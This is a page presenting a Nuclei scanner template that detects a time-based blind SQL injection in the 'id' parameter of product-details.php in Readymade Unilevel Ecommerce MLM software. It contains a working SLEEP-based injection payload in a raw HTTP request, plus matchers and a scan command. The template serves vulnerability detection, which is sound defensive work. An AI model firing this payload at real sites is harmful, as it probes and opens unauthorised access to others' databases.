Skip to content

Readymade Unilevel Ecommerce MLM - SQL Injection

ID: readymade-unilevel-sqli

Severity: high

Author: s4e-io

Tags: time-based-sqli,ecommerce,readymade,sqli

Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id

id: readymade-unilevel-sqli
info:
name: Readymade Unilevel Ecommerce MLM - SQL Injection
author: s4e-io
severity: high
description: |
Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id
reference:
- https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
metadata:
vendor: i-netsolution
product: readymade-unilevel-ecommerce
tags: time-based-sqli,ecommerce,readymade,sqli
http:
- raw:
- |
@timeout 30s
GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "status_code == 200"
- 'contains(content_type,"text/html")'
- 'contains_all(body, "user_login_id", "Products</a>")'
condition: and
# digest: 4b0a00483046022100e9dea4c1ad0b7d765943595d3f8f312090f5fc65bdfee3cfbe78a1784707c86e022100955b054d0f7cea57b1e59fe20b66f110e7531999326541b31f8477e2172ab2dc:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/readymade-unilevel-sqli.yaml"

View on Github